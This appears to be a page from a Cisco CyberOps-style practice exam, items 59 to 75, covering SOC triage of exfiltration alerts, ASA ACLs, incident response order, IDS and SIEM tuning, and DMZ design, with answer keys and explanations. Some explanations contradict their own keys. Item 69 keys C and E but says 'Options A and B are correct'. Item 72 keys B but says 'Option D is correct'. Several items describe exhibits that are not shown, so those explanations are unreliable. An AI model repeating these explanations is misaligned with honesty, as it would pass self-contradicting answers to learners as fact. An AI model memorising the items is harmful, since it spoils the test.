You are an analyst in a SOC that monitors a retail company with multiple branch offices. The company uses VPN connections between branches. The SIEM reports that a branch office router (IP 10.99.0.1) has been sending large amounts of data to an external IP 185.220.101.10 on port 123 (NTP) during off-hours. The NTP traffic is abnormal because the branch uses a local time server. The amount of data sent is 2 GB over 8 hours. The router logs show normal administrative traffic. The branch manager reports no issues. You check threat intelligence and find that 185.220.101.10 is a known malicious IP associated with data exfiltration. What should be your immediate response?

A.Disable NTP service on the branch router
B.Notify the CISO and wait for further instructions
C.Block the external IP 185.220.101.10 on the firewall and initiate incident response for the router
D.Contact the branch manager to confirm if any scheduled backups are running
AnswerC

Blocking the IP stops the exfiltration, and investigating the router determines if it is compromised.

Why this answer

Option C is correct because the branch router is sending 2 GB of NTP traffic to a known malicious IP (185.220.101.10) during off-hours, which is a strong indicator of data exfiltration using NTP (often via tunneling or covert channels). The immediate response should be to block the external IP on the firewall to stop the data flow and initiate incident response to investigate the compromised router, as the traffic is abnormal (branch uses a local time server) and the IP is associated with exfiltration.

Exam trap

Cisco often tests the candidate's ability to prioritize immediate containment (blocking the malicious IP) over administrative or investigative delays, and the trap here is that candidates may choose to disable the service (Option A) without realizing that the exfiltration is already in progress and must be stopped at the network level first.

How to eliminate wrong answers

Option A is wrong because disabling NTP service on the branch router would not stop the ongoing exfiltration (the traffic is already being sent to the malicious IP) and could disrupt legitimate time synchronization if the local time server fails; the priority is to block the external communication. Option B is wrong because notifying the CISO and waiting for further instructions delays the immediate containment action required to stop data exfiltration, violating the SOC's duty to mitigate active threats. Option D is wrong because contacting the branch manager to confirm scheduled backups is irrelevant—backups would not use NTP port 123 to send 2 GB of data to a known malicious IP, and this action wastes time during an active security incident.

59
MCQhard

Refer to the exhibit. A security analyst is reviewing the ASA configuration. Which traffic will be permitted from the outside interface?

A.Any IP traffic to host 10.1.1.1
B.All traffic from the outside to the inside network
C.TCP traffic to host 10.1.1.1 on port 80
D.HTTP traffic from internal hosts to the outside
AnswerC

The first ACL line permits TCP to 10.1.1.1 port 80.

Why this answer

The correct answer is C because the ASA configuration shown includes an access-list entry that permits TCP traffic from any source to host 10.1.1.1 on port 80. This is the only rule that explicitly allows traffic from the outside interface to the inside network, and since the outside interface has the access-group applied inbound, only traffic matching this permit statement will be allowed.

Exam trap

Cisco often tests the distinction between 'any IP traffic' and 'any TCP traffic' — the trap here is that candidates may assume 'permit tcp any host 10.1.1.1 eq 80' allows all IP traffic to that host, but it strictly permits only TCP with destination port 80.

How to eliminate wrong answers

Option A is wrong because the access-list permits only TCP traffic to host 10.1.1.1, not any IP traffic (which would include UDP, ICMP, etc.). Option B is wrong because the access-list does not permit all traffic from outside to inside; it only permits TCP traffic to a specific host on a specific port. Option D is wrong because the question asks about traffic permitted from the outside interface, not traffic originating from internal hosts; HTTP traffic from internal hosts to the outside would be evaluated by a different access-list applied to the inside interface or by stateful inspection rules.

60
MCQmedium

An incident response plan specifies that containment must be completed before eradication. A security analyst identifies a malware infection on a critical server. What should be done first?

A.Disconnect the server from the network
B.Run antivirus scans
C.Notify law enforcement
D.Reinstall the operating system
AnswerA

Disconnecting is a containment action that prevents further spread.

Why this answer

According to the incident response plan, containment must be completed before eradication. Disconnecting the server from the network (Option A) is the immediate containment action that prevents the malware from spreading laterally to other hosts, preserving the integrity of the network and allowing for forensic analysis. This step aligns with the NIST SP 800-61 incident response lifecycle, where containment is prioritized to limit damage before any eradication or recovery steps are taken.

Exam trap

Cisco often tests the strict ordering of the incident response phases (Preparation, Detection & Analysis, Containment, Eradication, Recovery, Post-Incident Activity), and the trap here is that candidates confuse eradication actions (like running antivirus or reinstalling the OS) with the required first containment step, leading them to choose a technically plausible but procedurally incorrect answer.

How to eliminate wrong answers

Option B is wrong because running antivirus scans is an eradication or detection step, not a containment action; performing scans before containment could alert the malware or cause it to spread further. Option C is wrong because notifying law enforcement is a post-containment notification step that occurs after the scope of the incident is understood and evidence is preserved, not the first action. Option D is wrong because reinstalling the operating system is a recovery/eradication step that should only occur after containment is complete and forensic evidence has been collected; doing so first would destroy volatile data and potentially violate chain of custody.

61
Multi-Selectmedium

Which THREE indicators are commonly found in network traffic that suggest a host is part of a botnet? (Choose three.)

Select 3 answers
A.Connections to known IRC servers on non-standard ports
B.Large file downloads from external servers
C.Periodic connections to IP addresses with poor reputation
D.High volumes of outbound traffic to multiple destinations
E.Frequent DNS queries to legitimate corporate DNS servers
AnswersA, C, D

IRC is a common C2 channel.

Why this answer

Option A is correct because botnets often use IRC (Internet Relay Chat) for command and control (C2) communication. Attackers configure IRC servers on non-standard ports (e.g., TCP 6667–6669 are common, but botnets may use ports like 8080, 8443, or random high ports) to evade detection by security tools that monitor default IRC ports. The presence of persistent IRC connections to unusual ports is a strong indicator of botnet activity.

Exam trap

Cisco often tests the distinction between normal network behavior (like large downloads or frequent DNS queries) and specific botnet indicators (IRC on non-standard ports, connections to low-reputation IPs, and asymmetric outbound traffic patterns), trapping candidates who confuse generic high-bandwidth activity with botnet C2 signatures.

62
Multi-Selecteasy

Which TWO are examples of technical security controls? (Select two.)

Select 2 answers
A.Firewall
B.Security policy
C.Security awareness training
D.Background checks
E.Encryption
AnswersA, E

Firewalls are technical controls that filter network traffic.

Why this answer

A firewall is a technical security control because it is a hardware or software device that enforces access policies by inspecting network traffic based on rules (e.g., permit/deny IP addresses, ports, protocols). Encryption is a technical control that transforms plaintext data into ciphertext using algorithms like AES-256 or RSA, ensuring confidentiality during storage or transmission. Both are implemented through technology rather than administrative or physical means.

Exam trap

Cisco often tests the distinction between administrative, physical, and technical controls, and the trap here is that candidates confuse a security policy (a document) or training (a human process) with a technical control, because they are all part of a defense-in-depth strategy.

63
MCQeasy

Based on the exhibit, which host is likely engaged in data exfiltration?

A.10.0.0.1
B.10.0.0.3
C.10.0.0.2
D.None of the above
AnswerA

This host has large volumes of data to external web servers.

Why this answer

Host 10.0.0.1 is likely engaged in data exfiltration because the exhibit shows a large volume of outbound TCP traffic from this IP to an external destination on port 443 (HTTPS), with a significantly higher byte count compared to other hosts. This pattern is consistent with data being encrypted and sent to an external server, a common exfiltration technique to bypass inspection.

Exam trap

Cisco often tests the concept that data exfiltration is indicated by a high volume of outbound traffic to an external destination, especially over encrypted channels, and the trap here is that candidates may overlook the byte count asymmetry and focus only on the destination port or protocol, missing the key behavioral indicator.

How to eliminate wrong answers

Option B (10.0.0.3) is wrong because its traffic pattern shows a balanced exchange of packets with internal hosts, typical of normal internal communication, not exfiltration. Option C (10.0.0.2) is wrong because its outbound traffic volume is low and primarily to internal IPs, indicating routine operations rather than data theft. Option D (None of the above) is wrong because the exhibit clearly identifies 10.0.0.1 as the host with anomalous outbound data volume, making it the correct choice.

64
MCQhard

A Cisco Firepower sensor is generating a high number of false positives from a rule that triggers on large ICMP packets. The analyst suspects the rule threshold is too low. Which tuning action most effectively reduces false positives while maintaining detection of actual attacks?

A.Change the rule action from alert to drop.
B.Disable the rule entirely.
C.Add an exception for trusted source IPs.
D.Increase the packet size threshold.
AnswerD

This directly addresses the cause of false positives without disabling detection.

Why this answer

Increasing the packet size threshold (Option D) directly addresses the root cause of the false positives: the rule is triggering on legitimate large ICMP packets that are below the actual attack size. By raising the threshold to a value that still captures known attack vectors (e.g., ICMP echo requests exceeding 65,535 bytes in a fragmented attack), the sensor reduces noise while preserving detection of true malicious oversized packets. This is the most effective tuning action because it adjusts the detection parameter without disabling or bypassing the rule.

Exam trap

Cisco often tests the misconception that changing the rule action (e.g., to drop) or adding exceptions is the best way to reduce false positives, when in fact the most precise and effective method is to adjust the detection threshold parameter that is causing the false positives.

How to eliminate wrong answers

Option A is wrong because changing the rule action from alert to drop would still generate false positives (the rule would still match and drop legitimate traffic), potentially causing denial of service for valid large ICMP packets, and does not reduce the false positive rate. Option B is wrong because disabling the rule entirely eliminates detection of all oversized ICMP attacks, leaving the network vulnerable to actual threats such as ICMP fragmentation or ping-of-death attacks. Option C is wrong because adding an exception for trusted source IPs only reduces false positives from those specific sources; it does not address the underlying threshold issue and may miss attacks originating from trusted IPs that have been compromised.

65
MCQmedium

A host is infected with malware that uses DNS tunneling to exfiltrate data. Which type of analysis would best detect this activity?

A.DNS log analysis
B.Windows event log analysis
C.Firewall log analysis
D.NetFlow analysis
AnswerA

DNS logs show query names, sizes, and frequency.

Why this answer

DNS tunneling encodes exfiltrated data within DNS queries or responses, often using TXT or A record types to bypass network security controls. DNS log analysis is the most direct detection method because it reveals anomalous patterns such as unusually long domain names, excessive NXDOMAIN responses, or high volumes of DNS traffic to a single external server, which are hallmarks of tunneling activity.

Exam trap

Cisco often tests the misconception that firewall logs or NetFlow are sufficient for detecting application-layer tunneling, when in fact only DNS-specific logs provide the granularity to see the encoded payloads within DNS queries.

How to eliminate wrong answers

Option B is wrong because Windows event log analysis focuses on system-level events (e.g., process creation, user logins) and does not capture network-layer DNS traffic, so it would miss the outbound data exfiltration. Option C is wrong because firewall logs typically record IP addresses, ports, and protocols but lack the DNS query/response payload details needed to detect the encoded data within DNS messages. Option D is wrong because NetFlow analysis provides metadata (source/destination IP, bytes transferred) but does not inspect the content of DNS packets, making it unable to identify the tunneling pattern or the data being exfiltrated.

66
MCQhard

Refer to the exhibit. A network administrator notices that remote SSH logins to the router succeed, but the router is not sending accounting records. Based on the configuration, what is the most likely cause?

A.The AAA authorization method is set to local, not TACACS+.
B.The TACACS+ server key is not configured correctly.
C.The AAA authentication method uses local database instead of TACACS+.
D.The accounting command references a TACACS+ group that is not defined.
AnswerD

The group 'tacacs+' is not defined; only a server is configured.

Why this answer

The correct answer is D because the `accounting exec default` command references a TACACS+ server group named 'tacacs_server_group' that is not defined in the configuration. Without a defined server group, the router cannot send accounting records to any TACACS+ server, even though SSH authentication succeeds via the local database.

Exam trap

Cisco often tests the distinction between authentication, authorization, and accounting (AAA) components, and the trap here is that candidates assume a working authentication implies accounting is also functional, overlooking that accounting requires a correctly defined and referenced server group.

How to eliminate wrong answers

Option A is wrong because the AAA authorization method is not the issue; authorization controls what commands or services a user can execute, not whether accounting records are sent. Option B is wrong because the TACACS+ server key is configured correctly with the `key cisco123` command under the TACACS+ server definition, so key mismatch is not the cause. Option C is wrong because the AAA authentication method uses the local database for login, which allows SSH access to succeed, but accounting is independent of authentication; the problem is that the accounting method references an undefined server group, not that authentication uses local.

67
Multi-Selecthard

An analyst is investigating an alert triggered by a Snort rule that matches traffic on port 445 (SMB). The analyst sees that the signature has a high false positive rate. Which THREE factors should the analyst evaluate to tune the signature for better accuracy? (Choose three.)

Select 3 answers
A.Implementing a behavioral analysis heuristic to detect anomalous SMB activity.
B.Disabling the rule to eliminate false positives.
C.Creating a rule exception for internal subnets that use SMB for file sharing.
D.Adjusting the detection threshold to only alert when a certain number of SMB events occur within a time window.
E.Adding specific destination IP addresses of legitimate SMB servers.
AnswersC, D, E

Exceptions for known benign traffic improve accuracy.

Why this answer

Option C is correct because creating a rule exception for internal subnets that legitimately use SMB for file sharing reduces false positives by excluding known benign traffic. This allows the Snort rule to focus on external or anomalous SMB traffic on port 445, improving detection accuracy without disabling the rule entirely.

Exam trap

Cisco often tests the distinction between tuning an existing signature (e.g., adding exceptions or thresholds) versus implementing entirely new detection methods (e.g., behavioral analysis), which leads candidates to mistakenly select options that propose changing the detection approach rather than refining the rule.

68
MCQhard

A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?

A.Place both servers on the internal network with host-based firewalls
B.Place the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from DMZ to internal
C.Use a VPN between the web server and database server
D.Place both servers on the same VLAN with a firewall between them
AnswerB

DMZ isolates web server; blocking outbound from DMZ prevents pivot.

Why this answer

Placing the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from the DMZ to internal, prevents an attacker who compromises the web server from initiating connections to the internal database server. This implements a default-deny rule for DMZ-to-internal traffic, forcing all database access to be initiated from the internal network only, which breaks the pivot chain. The DMZ acts as a buffer zone, isolating publicly accessible services from sensitive internal resources.

Exam trap

Cisco often tests the misconception that host-based firewalls or VLANs alone provide sufficient segmentation, when in fact network-level DMZ isolation with explicit direction-based firewall rules is required to prevent lateral movement after a perimeter breach.

How to eliminate wrong answers

Option A is wrong because placing both servers on the internal network with host-based firewalls still allows the compromised web server to directly reach the database server if the host firewall is misconfigured or bypassed, and it lacks network-level segmentation to prevent lateral movement. Option C is wrong because a VPN between the web server and database server encrypts traffic but does not restrict the direction of connection initiation; an attacker on the web server could still use the VPN tunnel to pivot to the database server. Option D is wrong because placing both servers on the same VLAN with a firewall between them still permits Layer 2 adjacency and potential ARP spoofing or VLAN hopping attacks, and the firewall would need to inspect all traffic, which is less effective than true network segmentation with a DMZ.

69
Multi-Selecteasy

Which two are best practices for deploying network-based intrusion detection systems? (Choose two.)

Select 2 answers
A.Place sensors behind firewalls to reduce false positives.
B.Enable all signatures to maximize detection.
C.Use tap or SPAN ports to ensure traffic visibility.
D.Use inline mode for all sensors to enable blocking.
E.Deploy sensors at network choke points.
AnswersC, E

Passive monitoring avoids impacting network performance.

Why this answer

Options A and B are correct. Deploying sensors at network choke points ensures visibility of all traffic, and using tap or SPAN ports allows passive monitoring without introducing latency or failure points. Option C is not a best practice because placing sensors behind firewalls may miss attacks that never reach the firewall.

Option D is not always appropriate as inline mode can introduce latency and is not required for detection. Option E would generate excessive false positives.

70
MCQmedium

You are a cybersecurity analyst in a SOC. The company uses a combination of Snort NIDS and Windows Event Log monitoring. At 3:00 PM, you receive a critical alert: 'ET TROJAN Observed Malicious SSL Certificate (Fake Google)'. The alert shows that a workstation (IP 10.0.1.45) initiated an SSL connection to IP 192.0.2.10 on port 443. The certificate presented by the server is self-signed and claims to be 'google.com'. The destination IP is not in any known Google IP range. You check the firewall logs and see that the outbound connection was allowed. The workstation's host logs show that the user is a marketing employee who frequently accesses webmail. The user reports no unusual behavior. You also check the company's web proxy logs and see that the user accessed 'http://www.google.com' earlier today, but the SSL connection is to a different IP. What should be your next step?

A.Ignore the alert because the user is unaware of any issue
B.Isolate the workstation from the network and perform a forensic analysis
C.Wait and monitor the workstation for further alerts before taking action
D.Block the destination IP 192.0.2.10 on the firewall
AnswerB

Isolating the workstation prevents further damage, and forensic analysis can determine the root cause and scope of compromise.

Why this answer

The alert indicates a potential man-in-the-middle (MITM) attack or malware using a self-signed SSL certificate impersonating google.com. Isolating the workstation is critical to prevent lateral movement or data exfiltration while preserving evidence for forensic analysis. The combination of Snort NIDS detecting the malicious certificate and the connection to an unknown IP (192.0.2.10) strongly suggests compromise, regardless of user reports.

Exam trap

Cisco often tests the principle that user reports of 'no unusual behavior' are unreliable in incident response, and that immediate containment (isolation) takes precedence over monitoring or partial blocking.

How to eliminate wrong answers

Option A is wrong because ignoring the alert based solely on user denial is a security risk; users are often unaware of silent compromise (e.g., malware or MITM). Option C is wrong because waiting for further alerts could allow the attacker to exfiltrate data or pivot to other hosts; immediate containment is required. Option D is wrong because blocking the destination IP alone does not address the potential compromise of the workstation; the attacker could use other IPs or the malware may already be active locally.

71
MCQeasy

A security analyst reviews the firewall log. What is the most likely reason for the denied connection?

A.The destination port is blocked by default
B.The source IP address is an external threat
C.The destination IP is a known malicious host
D.The access control list does not permit the traffic
AnswerD

Denied by access-group indicates ACL blocking.

Why this answer

The firewall log shows a denied connection, and the most likely reason is that the access control list (ACL) does not permit the traffic. Firewalls enforce security policies by evaluating traffic against ACL rules; if no rule explicitly allows the packet (based on source/destination IP, port, and protocol), the implicit deny at the end of the ACL drops the connection. This is the default behavior for stateful firewalls and is the most common cause of denied connections in logs.

Exam trap

Cisco often tests the concept that the implicit deny at the end of an ACL is the most common reason for denied traffic, tempting candidates to overthink with threat-based answers like external IPs or malicious hosts.

How to eliminate wrong answers

Option A is wrong because destination ports are not 'blocked by default' in a generic sense; firewalls block traffic based on ACL rules, not a default port blocklist, and many ports (e.g., 80, 443) are often permitted unless explicitly denied. Option B is wrong because the source IP being an external threat is a specific threat intelligence match, not the most likely reason for a denied connection; firewalls deny traffic primarily due to ACL mismatches, not because of external threat lists unless a rule explicitly references them. Option C is wrong because the destination IP being a known malicious host would require the firewall to have a threat intelligence feed or a specific block rule; without such a rule, the firewall would not deny traffic based solely on reputation, and the log entry would typically indicate a threat block, not a generic ACL deny.

72
MCQmedium

During a change management process, a security administrator approves a firewall rule change. After implementation, a critical application becomes unreachable. Which step in the change process was likely missed?

A.Post-implementation documentation
B.Backout plan development
C.Testing in a staging environment
D.Peer review of the change
AnswerB

Without a backout plan, reverting changes is delayed.

Why this answer

A thorough backout plan should be prepared before change implementation so that if issues occur, the change can be reversed. Option D is correct. Option A (peer review) helps but is not the direct cause.

Option B (testing) might have been done but not the immediate issue. Option C (documentation) is important but not the direct cause of unreachability.

73
MCQhard

A security analyst for a medium-sized enterprise is monitoring the network using Cisco Stealthwatch. They notice a sudden spike in traffic originating from an internal host (IP 10.10.10.50) communicating with multiple external IP addresses on port 445 (SMB). The host is a Windows server that typically serves web applications on ports 80 and 443. The analyst checks the host's firewall logs and finds that Windows Firewall is disabled. The host's antivirus is up to date and no alerts were triggered. The traffic pattern shows multiple connection attempts to /24 subnets across the internet, each with a single packet per destination. Based on this behavior, what is the most likely issue?

A.The host is infected with malware that is performing network reconnaissance.
B.The host is part of a distributed vulnerability scanning initiative.
C.The host is being used for a DDoS amplification attack.
D.The host is legitimately scanning the internet for outdated SMB shares.
AnswerA

The pattern matches malware scanning for SMB vulnerabilities (e.g., EternalBlue).

Why this answer

The traffic pattern—multiple connection attempts to /24 subnets across the internet, each with a single packet per destination—is classic behavior for network reconnaissance, specifically scanning for open SMB ports. The host's Windows Firewall being disabled and the lack of antivirus alerts indicate that the host is likely compromised and running malware that is performing this reconnaissance, as legitimate scanning or DDoS amplification would not exhibit this single-packet-per-destination pattern.

Exam trap

Cisco often tests the distinction between reconnaissance (scanning) and attack (exploitation/DDoS), where candidates may confuse the single-packet scanning pattern with DDoS amplification or legitimate scanning, but the key is the lack of handshake completion and the disabled firewall indicating compromise.

How to eliminate wrong answers

Option B is wrong because a distributed vulnerability scanning initiative would typically be coordinated and authorized, with consistent scanning patterns and proper logging, not originating from a single host with a disabled firewall and no alerts. Option C is wrong because a DDoS amplification attack would involve sending small queries to reflectors that then send large responses to a victim, not the host itself making single-packet connections to multiple destinations on port 445. Option D is wrong because legitimate scanning of the internet for outdated SMB shares would be authorized and would not occur from a web server with a disabled firewall and no antivirus alerts; such activity is almost always malicious.

74
Multi-Selectmedium

Which TWO of the following are best practices when configuring a SIEM for security monitoring?

Select 2 answers
A.Tune rules to reduce false positives.
B.Disable logging for low-security systems.
C.Prioritize alerts based on risk.
D.Use the same log source for all event types.
E.Enable all default correlation rules.
AnswersA, C

Tuning improves alert accuracy and reduces noise.

Why this answer

Tuning SIEM rules to reduce false positives is a best practice because it improves the signal-to-noise ratio, ensuring that security analysts focus on genuine threats rather than being overwhelmed by irrelevant alerts. By adjusting thresholds, whitelisting known benign activity, or refining correlation logic, the SIEM becomes more efficient and reduces alert fatigue, which is critical for effective security monitoring.

Exam trap

Cisco often tests the misconception that more logging or more rules always equals better security, when in fact untuned defaults and excessive logging degrade monitoring effectiveness and increase operational burden.

75
MCQhard

You are a security analyst for a medium-sized enterprise. The network includes a DMZ with a web server (10.0.1.10) and a database server (10.0.2.10) in the internal network. Users access the web server via HTTPS from the internet. The web server queries the database server on TCP 3306. Recently, users reported that the web application sometimes returns database errors. You review firewall logs and see the following: - Allowed inbound HTTPS to 10.0.1.10 from various external IPs. - Denied outbound from 10.0.1.10 to 10.0.2.10 on port 3306. - Allowed outbound from 10.0.1.10 to external IPs on port 443. You also notice that the web server's outbound traffic to the database server is being blocked. The firewall has a default deny rule. Which action should you take to restore normal operation while maintaining security?

A.Create a rule allowing inbound traffic on TCP 3306 to the database server from any source.
B.Move the database server to the DMZ to avoid firewall restrictions.
C.Create a rule allowing all outbound traffic from the DMZ to the internal network.
D.Create a rule allowing outbound traffic from the web server IP (10.0.1.10) to the database server IP (10.0.2.10) on TCP 3306.
AnswerD

This specifically allows the needed traffic while minimizing exposure.

Why this answer

The firewall logs show that outbound traffic from the web server (10.0.1.10) to the database server (10.0.2.10) on TCP 3306 is being denied, which causes the database errors. Since the web server initiates the connection to the database, a rule allowing this specific outbound traffic from the web server to the database server on port 3306 restores functionality while maintaining the default-deny posture. This is the most secure approach because it permits only the necessary traffic between the two specific hosts and port, without opening broader access.

Exam trap

Cisco often tests the misconception that you need an inbound rule for the database server when the traffic is actually initiated from the web server outbound, leading candidates to choose Option A or C.

How to eliminate wrong answers

Option A is wrong because allowing inbound traffic on TCP 3306 to the database server from any source would expose the database directly to the internet, bypassing the web server and creating a severe security risk. Option B is wrong because moving the database server to the DMZ would expose it to the same network segment as the web server and potentially the internet, increasing the attack surface and violating the principle of defense in depth. Option C is wrong because allowing all outbound traffic from the DMZ to the internal network would permit any DMZ host to reach any internal host on any port, which is overly permissive and could enable lateral movement by an attacker who compromises a DMZ device.

Page 1 of 7

Page 2

All pages